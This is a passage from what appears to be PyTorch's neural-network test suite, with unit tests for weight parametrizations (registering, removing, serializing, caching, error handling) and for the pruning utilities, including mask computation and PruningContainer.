# Check that the model is still parametrized and so is the second parameter
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertTrue(parametrize.is_parametrized(model)) # Still parametrized
self.assertFalse(parametrize.is_parametrized(model, "weight")) # Parametrization removed
self.assertTrue(parametrize.is_parametrized(model, "bias")) # Still parametrized
self.assertEqual(model.bias[0].item(), 0.) # Still parametrized
self.assertEqual(model.bias[-1].item(), 0.) # Still parametrized
self.assertNotEqual(model.weight, initial_model.weight) # Has been updated
self.assertEqual(id(model.weight), initial_weight_id) # Keeps the same id
self.assertEqual(len(list(model.parameters())), 2) # Nothing weird has happened
# Should not throw
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
# Remove the second parametrization.
# Check that the module is not parametrized
parametrize.remove_parametrizations(model, "bias", leave_parametrized=False)
self.assertFalse(parametrize.is_parametrized(model)) # Not parametrized
self.assertNotEqual(model.bias, initial_model.bias) # Has been updated
self.assertNotEqual(model.bias[0].item(), 0.) # Not parametrized
self.assertNotEqual(model.bias[-1].item(), 0.) # Not parametrized
self.assertEqual(id(model.bias), initial_bias_id) # Keeps the same id
self.assertFalse(hasattr(model, "parametrizations")) # Not parametrized the module
self.assertEqual(model.__class__, nn.Linear) # Resores the previous class
self.assertEqual(len(list(model.parameters())), 2) # Nothing weird has happeed
# Should not throw things are updated
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
# Test leave_parametrized=True
for _ in range(2):
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
parametrize.remove_parametrizations(model, "weight", leave_parametrized=True)
# We didn't change the dtype nor had multiple inputs, so the id should be the same
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(id(model.bias), initial_bias_id)
# Should not throw. Things are updated
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
def test_register_and_remove_buffer_parametrization(self):
r"""Test that it is possible to add and remove parametrizations on buffers"""
# Define a couple vector parametrizations
class FirstZero(nn.Module):
def forward(self, x):
return torch.cat([x.new_zeros(1), x[1:]])
class LastZero(nn.Module):
def forward(self, x):
return torch.cat([x[:-1], x.new_zeros(1)])
model = nn.Linear(8, 8)
# Instantiate parametrizations on buffers. It should work as expected
delattr(model, "bias")
model.register_buffer("bias", torch.ones(8))
parametrize.register_parametrization(model, "bias", FirstZero())
parametrize.register_parametrization(model, "bias", LastZero())
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "bias"))
self.assertEqual(model.bias[0].item(), 0.)
self.assertEqual(model.bias[-1].item(), 0.)
self.assertTrue((model.bias[1:-1] == torch.ones(6)).all())
self.assertEqual(len(list(model.parameters())), 1)
# Remove parametrizations on buffers. It should work as expected
parametrize.remove_parametrizations(model, "bias", leave_parametrized=True)
self.assertFalse(parametrize.is_parametrized(model))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertEqual(model.bias[0].item(), 0.)
self.assertEqual(model.bias[-1].item(), 0.)
self.assertTrue((model.bias[1:-1] == torch.ones(6)).all())
self.assertEqual(len(list(model.parameters())), 1)
def test_serialization_parametrization(self):
r"""Test that it is possible to serialize a parametrized model via state_dict"""
# A stateful parametrization
class Orthogonal(nn.Module):
def __init__(self, n):
super().__init__()
self.register_buffer("id", torch.eye(n))
self.register_buffer("B", torch.empty(n, n))
init.orthogonal_(self.B)
def forward(self, X):
A = X.triu(1)
A = A - A.T
return self.B @ torch.linalg.solve(self.id + A, self.id - A)
def get_model():
model = torch.nn.Sequential(
torch.nn.Linear(5, 5),
torch.nn.ReLU(),
torch.nn.Linear(5, 1),
)
parametrize.register_parametrization(model[0], "weight", Orthogonal(5))
return model
model = get_model()
prev_weight = model[0].weight
prev_B = model[0].parametrizations.weight[0].B
new_model = get_model()
with TemporaryFileName() as fname:
torch.save(model.state_dict(), fname)
new_model.load_state_dict(torch.load(fname))
# Integrity tests
self.assertTrue(parametrize.is_parametrized(new_model[0], "weight"))
self.assertEqual(prev_weight, new_model[0].weight)
self.assertEqual(prev_B, new_model[0].parametrizations.weight[0].B)
# Trying to save the whole parametrized model raises
with self.assertRaisesRegex(RuntimeError, "state_dict"):
with TemporaryFileName() as fname:
torch.save(model, fname)
def test_initialization_parametrization(self):
r"""Test that it is possible to initialize a parametrization when it
implements a `right_inverse` method
"""
class Skew(nn.Module):
def forward(self, X):
A = X.triu(1)
return A - A.T
def is_skew(self, A):
return torch.allclose(A, -A.T, atol=1e-6)
def right_inverse(self, X):
if not self.is_skew(X):
raise ValueError("The matrix is not skew-symmetric.")
return X.triu(1)
# Implements a Cayley map where right_inverse is not quite the inverse of forward
class Orthogonal(nn.Module):
def __init__(self, n):
super().__init__()
self.register_buffer("B", torch.eye(n))
def forward(self, X):
Id = torch.eye(X.size(0))
return self.B @ torch.linalg.solve(Id + X, Id - X)
def is_orthogonal(self, X):
Id = torch.eye(X.size(0))
return torch.allclose(X.T @ X, Id, atol=1e-4)
def right_inverse(self, X):
if not self.is_orthogonal(X):
raise ValueError("The input is not orthogonal.")
# cayley(0) == Id, so B @ cayley(0) == B
self.B = X
return torch.zeros_like(X)
N = 5
model = nn.Linear(N, N)
# Register the skew-symmetric constraint. The result is now skew-symmetric
skew = Skew()
# Make the weight skew-symmetric before registering the parametrization
with torch.no_grad():
model.weight.set_(skew(model.weight))
parametrize.register_parametrization(model, "weight", skew)
X = torch.rand(N, N)
# X is not skew-symmetric, so it throws an error
with self.assertRaises(ValueError):
model.weight = X
# Make X skew-symmetric
X = X - X.T
model.weight = X
self.assertEqual(model.parametrizations.weight.original, X.triu(1))
self.assertEqual(model.weight, X)
# Having several parametrizations registered should work in the same way
parametrize.register_parametrization(model, "weight", Orthogonal(N))
# Register now the Cayley map. The result is now orthogonal
X = torch.rand(N, N)
# X is not orthogonal, so it throws an error
with self.assertRaises(ValueError):
model.weight = X
init.orthogonal_(X)
model.weight = X
self.assertEqual(model.weight, X)
self.assertEqual(model.parametrizations.weight.original, torch.zeros_like(X))
def test_errors_unparametrized_tensor_parametrization(self):
# Test errors when registering a parametrization on an unparametrized tensor
module = nn.Linear(3, 4)
weight_init = module.weight.clone()
class Identity(nn.Module):
def forward(self, x):
return x
# Register a parametrization on a non-existing parameter throws
with self.assertRaisesRegex(ValueError, "does not have a parameter"):
parametrize.register_parametrization(module, "foo", Identity())
self.assertFalse(parametrize.is_parametrized(module))
# Removing parametrizations from an unparametrized tensor throws
with self.assertRaisesRegex(ValueError, "does not have a parametrization"):
parametrize.remove_parametrizations(module, "bias")
self.assertFalse(parametrize.is_parametrized(module))
# A correct parametrization with several outputs
class Sum(nn.Module):
def forward(self, x, y):
return x + y
def right_inverse(self, z):
return z, torch.zeros_like(z)
parametrize.register_parametrization(module, "weight", Sum())
# Cannot remove a parametrization with several outputs with `leave_parametrized=False`
with self.assertRaisesRegex(ValueError, "leave_parametrized=False"):
parametrize.remove_parametrizations(module, "weight", leave_parametrized=False)
parametrize.remove_parametrizations(module, "weight", leave_parametrized=True)
# A parametrization with an incorrect number of outputs
class WrongNumberParams(nn.Module):
def forward(self, x, y, z):
return x + y + z
def right_inverse(self, w):
return w, torch.zeros_like(w)
# Makes param(*param.right_inverse(X)) fail
with self.assertRaisesRegex(TypeError, "positional argument"):
parametrize.register_parametrization(module, "weight", WrongNumberParams())
self.assertFalse(parametrize.is_parametrized(module))
# A parametrization with a right_inverse that does not return a Tensor or Sequence[Tensor]
class WrongRightInverse(Identity):
def right_inverse(self, z):
return None
# right_inverse should return a Tensor or a Sequence[Tensor]
with self.assertRaisesRegex(ValueError, "Tensor or a Sequence of"):
parametrize.register_parametrization(module, "weight", WrongRightInverse())
self.assertFalse(parametrize.is_parametrized(module))
# If it's a sequence, it must to be a sequence of tensors
class WrongRightInverseSequence(nn.Module):
def forward(self, x, y):
return x
def right_inverse(self, z):
return None, z
with self.assertRaisesRegex(ValueError, "of the sequence with type"):
parametrize.register_parametrization(module, "weight", WrongRightInverseSequence())
self.assertFalse(parametrize.is_parametrized(module))
# A parametrization from one tensor to one tensor that changes the dtype
class ChangeDtypeInverse(nn.Module):
def forward(self, x):
return x.float()
def right_inverse(self, w):
return w.bool()
# For parametrizations that return one tensor, right_inverse may not change the dtype
with self.assertRaisesRegex(ValueError, "outputs one tensor, it may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtypeInverse())
self.assertFalse(parametrize.is_parametrized(module))
# Doesn't return a tensor
class NotTensor(nn.Module):
def forward(self, x):
return 2
# Forward must return a tensor
with self.assertRaisesRegex(ValueError, "must return a tensor"):
parametrize.register_parametrization(module, "weight", NotTensor())
self.assertFalse(parametrize.is_parametrized(module))
# A parametrization from one tensor to one tensor that changes the dtype
class ChangeDtype(nn.Module):
def forward(self, x):
return x.bool()
# forward should not change the initial dtype
with self.assertRaisesRegex(ValueError, "may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtype())
self.assertFalse(parametrize.is_parametrized(module))
# Change shape
class ChangeShape(nn.Module):
def forward(self, x):
return x[:-1]
# forward should not change the original shape
with self.assertRaisesRegex(ValueError, "may not change the shape"):
parametrize.register_parametrization(module, "weight", ChangeShape())
self.assertFalse(parametrize.is_parametrized(module))
# Many to one that changes dtype
class ChangeDtypeMulti(nn.Module):
def forward(self, x, y):
return (x + y).bool()
def right_inverse(self, w):
return w, w + 1
# forward should not change the original shape even for parametrizations with many inputs
with self.assertRaisesRegex(ValueError, "may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtypeMulti())
self.assertFalse(parametrize.is_parametrized(module))
# Returning a sequence of size one, although weird, it's correct
class SequenceLen1(nn.Module):
def forward(self, x):
return x
def right_inverse(self, w):
return (w,)
parametrize.register_parametrization(module, "weight", SequenceLen1())
self.assertTrue(hasattr(module.parametrizations.weight, "original0"))
self.assertFalse(hasattr(module.parametrizations.weight, "original1"))
_ = module.weight # Does not throw
self.assertTrue(parametrize.is_parametrized(module))
parametrize.remove_parametrizations(module, "weight", leave_parametrized=True)
# None of the operations above should have altered the weight
self.assertFalse(parametrize.is_parametrized(module))
self.assertEqual(module.weight, weight_init)
def test_errors_parametrized_tensor_parametrization(self):
# Test errors when registering a parametrization on a parametrized tensor
class Identity(nn.Module):
def forward(self, x):
return x
module = nn.Linear(3, 4)
parametrize.register_parametrization(module, "weight", Identity())
# Has to return a tensor
class WrongReturn(nn.Module):
def forward(self, x):
return x, x
with self.assertRaisesRegex(ValueError, "must return a tensor"):
parametrize.register_parametrization(module, "weight", WrongReturn())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change dtype
class ChangeDtype(nn.Module):
def forward(self, x):
return x.bool()
with self.assertRaisesRegex(ValueError, "may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtype())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change shape
class ChangeShape(nn.Module):
def forward(self, x):
return x[:-1]
with self.assertRaisesRegex(ValueError, "may not change the shape"):
parametrize.register_parametrization(module, "weight", ChangeShape())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# The following checks are mostly due to bugs in the code of the parametrization
# right_inverse has to return a tensor
class WrongReturnInverse(Identity):
def right_inverse(self, x):
return x, x
with self.assertRaisesRegex(ValueError, "right_inverse must return a tensor"):
parametrize.register_parametrization(module, "weight", WrongReturnInverse())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change dtype
class ChangeDtypeInverse(Identity):
def right_inverse(self, x):
return x.bool()
with self.assertRaisesRegex(ValueError, "must have the same dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtypeInverse())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change shape
class ChangeShapeInverse(Identity):
def right_inverse(self, x):
return x[:-1]
with self.assertRaisesRegex(ValueError, "must have the same shape"):
parametrize.register_parametrization(module, "weight", ChangeShapeInverse())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
def test_multiple_inputs_parametrization(self):
# A parametrization with several outputs
class RankOne(nn.Module):
def forward(self, x, y):
# Form a rank-1 matrix from a pair of vectors
return x.unsqueeze(-1) @ y.unsqueeze(-2)
def right_inverse(self, Y):
# We project the given matrix onto the rank 1 matrices
U, S, Vh = torch.linalg.svd(Y, full_matrices=False)
# S is ordered in a decreasing way.
s0_sqrt = S[0].sqrt().unsqueeze(-1)
return U[..., :, 0] * s0_sqrt, Vh[..., 0, :] * s0_sqrt
# Simple parametrisation
class Double(nn.Module):
def forward(self, x):
return 2.0 * x
def right_inverse(self, w):
return 0.5 * w
model = nn.Linear(3, 3)
# Test one parametrization
parametrize.register_parametrization(model, "weight", RankOne())
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertTrue(hasattr(model.parametrizations.weight, "original0"))
self.assertIn("original0", model.parametrizations.weight._parameters)
self.assertTrue(hasattr(model.parametrizations.weight, "original1"))
self.assertIn("original1", model.parametrizations.weight._parameters)
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
# Result should be rank 1
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
with self.assertRaisesRegex(ValueError, "leave_parametrized=False"):
# Cannot remove a parametrization with multiple inputs and not leave it parametrized
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
# Remove parametrization and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=True)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.__class__, nn.Linear)
self.assertFalse(parametrize.is_parametrized(model))
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
self.assertIn("weight", model._parameters)
# Registering parametrizations with one input on top of one with multiple inputs should work
init_weight = model.weight.clone()
parametrize.register_parametrization(model, "weight", RankOne())
# Projecting a rank 1 matrix onto the matrices of rank one does not change the matrix
self.assertEqual(init_weight, model.weight)
parametrize.register_parametrization(model, "weight", Double())
# The matrix now is twice the initial matrix
self.assertEqual(2.0 * init_weight, model.weight)
# Multiplying by a scalar does not change the rank
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
# The model has now three parameters
self.assertEqual(len(list(model.parameters())), 3)
sgd = torch.optim.SGD(model.parameters(), lr=0.1)
# Test backward. Should not throw
for _ in range(2):
sgd.zero_grad()
loss = (model.weight.T @ model.bias).sum()
loss.backward()
sgd.step()
# Same drill as before, removing should work as expected
with self.assertRaisesRegex(ValueError, "leave_parametrized=False"):
# Cannot remove a parametrization with multiple inputs and not leave it parametrized
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
# Remove parametrization and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=True)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.__class__, nn.Linear)
self.assertFalse(parametrize.is_parametrized(model))
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
self.assertIn("weight", model._parameters)
# The model has now two parameters
self.assertEqual(len(list(model.parameters())), 2)
# Test backward. Should not throw
sgd = torch.optim.SGD(model.parameters(), lr=0.1)
for _ in range(2):
sgd.zero_grad()
loss = (model.weight.T @ model.bias).sum()
loss.backward()
sgd.step()
def test_caching_parametrization(self):
r"""Test the caching system of a parametrization"""
# Define a couple matrix parametrizations
class Skew(nn.Module):
def forward(self, X):
X = X.tril(-1)
return X - X.T
class Orthogonal(nn.Module):
def forward(self, X):
Id = torch.eye(X.size(0), device=X.device)
return torch.linalg.solve(Id + X, Id - X)
model = nn.Linear(5, 5)
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
# Test that the caching system works
with parametrize.cached():
X = model.weight
Y = model.weight
self.assertEqual(id(X), id(Y))
def test_parametrization_same_training_mode(self):
r"""Test training mode updated on parametrization registration"""
class Identity(nn.Module):
def forward(self, X):
return X
module = nn.Linear(4, 4)
module.eval()
parametrize.register_parametrization(module, "weight", Identity())
self.assertFalse(module.parametrizations.weight[0].training)
module.train()
parametrize.register_parametrization(module, "weight", Identity().eval())
self.assertTrue(module.parametrizations.weight[0].training)
self.assertTrue(module.parametrizations.weight[1].training)
# torch/nn/utils/prune.py
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_validate_pruning_amount_init(self):
r"""Test the first util function that validates the pruning
amount requested by the user the moment the pruning method
is initialized. This test checks that the expected errors are
raised whenever the amount is invalid.
The original function runs basic type checking + value range checks.
It doesn't check the validity of the pruning amount with
respect to the size of the tensor to prune. That's left to
`_validate_pruning_amount`, tested below.
"""
# neither float not int should raise TypeError
with self.assertRaises(TypeError):
prune._validate_pruning_amount_init(amount="I'm a string")
# float not in [0, 1] should raise ValueError
with self.assertRaises(ValueError):
prune._validate_pruning_amount_init(amount=1.1)
with self.assertRaises(ValueError):
prune._validate_pruning_amount_init(amount=20.)
# negative int should raise ValueError
with self.assertRaises(ValueError):
prune._validate_pruning_amount_init(amount=-10)
# all these should pass without errors because they're valid amounts
prune._validate_pruning_amount_init(amount=0.34)
prune._validate_pruning_amount_init(amount=1500)
prune._validate_pruning_amount_init(amount=0)
prune._validate_pruning_amount_init(amount=0.)
prune._validate_pruning_amount_init(amount=1)
prune._validate_pruning_amount_init(amount=1.)
self.assertTrue(True)
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_validate_pruning_amount(self):
r"""Tests the second util function that validates the pruning
amount requested by the user, this time with respect to the size
of the tensor to prune. The rationale is that if the pruning amount,
converted to absolute value of units to prune, is larger than
the number of units in the tensor, then we expect the util function
to raise a value error.
"""
# if amount is int and amount > tensor_size, raise ValueError
with self.assertRaises(ValueError):
prune._validate_pruning_amount(amount=20, tensor_size=19)
# amount is a float so this should not raise an error
prune._validate_pruning_amount(amount=0.3, tensor_size=0)
# this is okay
prune._validate_pruning_amount(amount=19, tensor_size=20)
prune._validate_pruning_amount(amount=0, tensor_size=0)
prune._validate_pruning_amount(amount=1, tensor_size=1)
self.assertTrue(True)
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_compute_nparams_to_prune(self):
r"""Test that requested pruning `amount` gets translated into the
correct absolute number of units to prune.
"""
self.assertEqual(
prune._compute_nparams_toprune(amount=0, tensor_size=15),
0
)
self.assertEqual(
prune._compute_nparams_toprune(amount=10, tensor_size=15),
10
)
# if 1 is int, means 1 unit
self.assertEqual(
prune._compute_nparams_toprune(amount=1, tensor_size=15),
1
)
# if 1. is float, means 100% of units
self.assertEqual(
prune._compute_nparams_toprune(amount=1., tensor_size=15),
15
)
self.assertEqual(
prune._compute_nparams_toprune(amount=0.4, tensor_size=17),
7
)
def test_random_pruning_sizes(self):
r"""Test that the new parameters and buffers created by the pruning
method have the same size as the input tensor to prune. These, in
fact, correspond to the pruned version of the tensor itself, its
mask, and its original copy, so the size must match.
"""
# fixturize test
# TODO: add other modules
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
original_tensor = getattr(m, name)
prune.random_unstructured(m, name=name, amount=0.1)
# mask has the same size as tensor being pruned
self.assertEqual(
original_tensor.size(),
getattr(m, name + '_mask').size()
)
# 'orig' tensor has the same size as the original tensor
self.assertEqual(
original_tensor.size(),
getattr(m, name + '_orig').size()
)
# new tensor has the same size as the original tensor
self.assertEqual(
original_tensor.size(),
getattr(m, name).size()
)
def test_random_pruning_orig(self):
r"""Test that original tensor is correctly stored in 'orig'
after pruning is applied. Important to make sure we don't
lose info about the original unpruned parameter.
"""
# fixturize test
# TODO: add other modules
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# tensor prior to pruning
original_tensor = getattr(m, name)
prune.random_unstructured(m, name=name, amount=0.1)
self.assertEqual(
original_tensor,
getattr(m, name + '_orig')
)
def test_random_pruning_new_weight(self):
r"""Test that module.name now contains a pruned version of
the original tensor obtained from multiplying it by the mask.
"""
# fixturize test
# TODO: add other modules
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# tensor prior to pruning
original_tensor = getattr(m, name)
prune.random_unstructured(m, name=name, amount=0.1)
# weight = weight_orig * weight_mask
self.assertEqual(
getattr(m, name),
getattr(m, name + '_orig')
* getattr(m, name + '_mask').to(
dtype=original_tensor.dtype
),
)
def test_identity_pruning(self):
r"""Test that a mask of 1s does not change forward or backward.
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
y_prepruning = m(input_) # output prior to pruning
# compute grad pre-pruning and check it's equal to all ones
y_prepruning.sum().backward()
old_grad_weight = m.weight.grad.clone() # don't grab pointer!
self.assertEqual(old_grad_weight, torch.ones_like(m.weight))
old_grad_bias = m.bias.grad.clone()
self.assertEqual(old_grad_bias, torch.ones_like(m.bias))
# remove grads
m.zero_grad()
# force the mask to be made of all 1s
prune.identity(m, name="weight")
# with mask of 1s, output should be identical to no mask
y_postpruning = m(input_)
self.assertEqual(y_prepruning, y_postpruning)
# with mask of 1s, grad should be identical to no mask
y_postpruning.sum().backward()
self.assertEqual(old_grad_weight, m.weight_orig.grad)
self.assertEqual(old_grad_bias, m.bias.grad)
# calling forward twice in a row shouldn't change output
y1 = m(input_)
y2 = m(input_)
self.assertEqual(y1, y2)
def test_random_pruning_0perc(self):
r"""Test that a mask of 1s does not change forward or backward.
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
y_prepruning = m(input_) # output prior to pruning
# compute grad pre-pruning and check it's equal to all ones
y_prepruning.sum().backward()
old_grad_weight = m.weight.grad.clone() # don't grab pointer!
self.assertEqual(old_grad_weight, torch.ones_like(m.weight))
old_grad_bias = m.bias.grad.clone()
self.assertEqual(old_grad_bias, torch.ones_like(m.bias))
# remove grads
m.zero_grad()
# force the mask to be made of all 1s
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = torch.ones_like(m.weight)
prune.random_unstructured(m, name='weight', amount=0.9) # amount won't count
# with mask of 1s, output should be identical to no mask
y_postpruning = m(input_)
self.assertEqual(y_prepruning, y_postpruning)
# with mask of 1s, grad should be identical to no mask
y_postpruning.sum().backward()
self.assertEqual(old_grad_weight, m.weight_orig.grad)
self.assertEqual(old_grad_bias, m.bias.grad)
# calling forward twice in a row shouldn't change output
y1 = m(input_)
y2 = m(input_)
self.assertEqual(y1, y2)
def test_random_pruning(self):
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
# define custom mask to assign with mock
mask = torch.ones_like(m.weight)
mask[1, 0] = 0
mask[0, 3] = 0
# check grad is zero for masked weights
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = mask
prune.random_unstructured(m, name='weight', amount=0.9)
y_postpruning = m(input_)
y_postpruning.sum().backward()
# weight_orig is the parameter, so it's the tensor that will accumulate the grad
self.assertEqual(m.weight_orig.grad, mask) # all 1s, except for masked units
self.assertEqual(m.bias.grad, torch.ones_like(m.bias))
# make sure that weight_orig update doesn't modify [1, 0] and [0, 3]
old_weight_orig = m.weight_orig.clone()
# update weights
learning_rate = 1.
for p in m.parameters():
p.data.sub_(p.grad.data * learning_rate)
# since these are pruned, they should not be updated
self.assertEqual(old_weight_orig[1, 0], m.weight_orig[1, 0])
self.assertEqual(old_weight_orig[0, 3], m.weight_orig[0, 3])
def test_random_pruning_forward(self):
r"""check forward with mask (by hand).
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
# define custom mask to assign with mock
mask = torch.zeros_like(m.weight)
mask[1, 0] = 1
mask[0, 3] = 1
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = mask
prune.random_unstructured(m, name='weight', amount=0.9)
yhat = m(input_)
self.assertEqual(yhat[0, 0], m.weight_orig[0, 3] + m.bias[0])
self.assertEqual(yhat[0, 1], m.weight_orig[1, 0] + m.bias[1])
def test_remove_pruning_forward(self):
r"""Remove pruning and check forward is unchanged from previous
pruned state.
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
# define custom mask to assign with mock
mask = torch.ones_like(m.weight)
mask[1, 0] = 0
mask[0, 3] = 0
# check grad is zero for masked weights
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = mask
prune.random_unstructured(m, name='weight', amount=0.9)
y_postpruning = m(input_)
prune.remove(m, 'weight')
y_postremoval = m(input_)
self.assertEqual(y_postpruning, y_postremoval)
def test_pruning_id_consistency(self):
r"""Test that pruning doesn't change the id of the parameters, which
would otherwise introduce issues with pre-existing optimizers that
point to old parameters.
"""
m = nn.Linear(5, 2, bias=False)
tensor_id = id(list(m.parameters())[0])
prune.random_unstructured(m, name="weight", amount=0.9)
self.assertEqual(tensor_id, id(list(m.parameters())[0]))
prune.remove(m, "weight")
self.assertEqual(tensor_id, id(list(m.parameters())[0]))
def test_random_pruning_pickle(self):
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
prune.random_unstructured(m, name=name, amount=0.1)
m_new = pickle.loads(pickle.dumps(m))
self.assertIsInstance(m_new, type(m))
def test_multiple_pruning_calls(self):
# if you call pruning twice, the hook becomes a PruningContainer
m = nn.Conv3d(2, 2, 2)
prune.l1_unstructured(m, name='weight', amount=0.1)
weight_mask0 = m.weight_mask # save it for later sanity check
# prune again
prune.ln_structured(m, name='weight', amount=0.3, n=2, dim=0)
hook = next(iter(m._forward_pre_hooks.values()))
self.assertIsInstance(
hook,
torch.nn.utils.prune.PruningContainer
)
# check that container._tensor_name is correctly set no matter how
# many pruning methods are in the container
self.assertEqual(hook._tensor_name, 'weight')
# check that the pruning container has the right length
# equal to the number of pruning iters
self.assertEqual(len(hook), 2) # m.weight has been pruned twice
# check that the entries of the pruning container are of the expected
# type and in the expected order
self.assertIsInstance(hook[0], torch.nn.utils.prune.L1Unstructured)
self.assertIsInstance(hook[1], torch.nn.utils.prune.LnStructured)
# check that all entries that are 0 in the 1st mask are 0 in the
# 2nd mask too
self.assertTrue(torch.all(m.weight_mask[weight_mask0 == 0] == 0))
# prune again
prune.ln_structured(m, name='weight', amount=0.1, n=float('inf'), dim=1)
# check that container._tensor_name is correctly set no matter how
# many pruning methods are in the container
hook = next(iter(m._forward_pre_hooks.values()))
self.assertEqual(hook._tensor_name, 'weight')
def test_pruning_container(self):
# create an empty container
container = prune.PruningContainer()
container._tensor_name = 'test'
self.assertEqual(len(container), 0)
p = prune.L1Unstructured(amount=2)
p._tensor_name = 'test'
# test adding a pruning method to a container
container.add_pruning_method(p)
# test error raised if tensor name is different
q = prune.L1Unstructured(amount=2)
q._tensor_name = 'another_test'
with self.assertRaises(ValueError):
container.add_pruning_method(q)
# test that adding a non-pruning method object to a pruning container
# raises a TypeError
with self.assertRaises(TypeError):
container.add_pruning_method(10)
with self.assertRaises(TypeError):
container.add_pruning_method('ugh')
def test_pruning_container_compute_mask(self):
r"""Test `compute_mask` of pruning container with a known `t` and
`default_mask`. Indirectly checks that Ln structured pruning is
acting on the right axis.
"""
# create an empty container
container = prune.PruningContainer()
container._tensor_name = 'test'
# 1) test unstructured pruning
# create a new pruning method
p = prune.L1Unstructured(amount=2)
p._tensor_name = 'test'
# add the pruning method to the container
container.add_pruning_method(p)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
# since we are pruning the two lowest magnitude units, the outcome of
# the calculation should be this:
expected_mask = torch.tensor([[0, 0, 1, 0], [1, 1, 0, 1]])
computed_mask = container.compute_mask(t, default_mask)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected_mask, computed_mask)
# 2) test structured pruning
q = prune.LnStructured(amount=1, n=2, dim=0)
q._tensor_name = 'test'
container.add_pruning_method(q)
# since we are pruning the lowest magnitude one of the two rows, the
# outcome of the calculation should be this:
expected_mask = torch.tensor([[0, 0, 0, 0], [1, 1, 0, 1]])
computed_mask = container.compute_mask(t, default_mask)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected_mask, computed_mask)
# 2) test structured pruning, along another axis
r = prune.LnStructured(amount=1, n=2, dim=1)
r._tensor_name = 'test'
container.add_pruning_method(r)
# since we are pruning the lowest magnitude of the four columns, the
# outcome of the calculation should be this:
